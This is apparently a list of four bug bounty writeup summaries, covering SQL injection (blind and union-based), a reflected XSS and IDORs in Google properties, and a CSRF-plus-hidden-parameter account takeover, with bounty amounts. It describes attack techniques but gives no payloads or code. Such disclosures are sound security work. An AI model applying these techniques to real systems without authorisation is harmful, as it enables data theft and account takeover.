A researcher discovered a SQL injection vulnerability in a trading company's reporting download endpoint via a hidden 'status' parameter that was discovered using parameter mining tools, exploitable through time-based blind SQL injection.
Writeup of three bugs submitted to Google VRP: a reflected XSS in artsexperiments.withgoogle.com discovered via ParamSpider and kxss automation, and two IDORs in AppSheet endpoints where access control could be bypassed—one requiring a specific version parameter to exploit. The author details the discovery process, initial rejections, and eventual acceptance with $500 bounties awarded.
Researcher discovered full account takeover vulnerability by chaining a missing CSRF token validation on the password change endpoint with a hidden 'uid' parameter discovered via Param Miner, allowing password changes for any user without authentication, resulting in a $1000 bounty.
A bug bounty hunter discovered a union-based SQL injection vulnerability in a private company's web application by identifying vulnerable parameters and methodically determining the number of columns (11) before extracting database version, user information, table schemas, and column names using UNION SELECT queries and information_schema enumeration.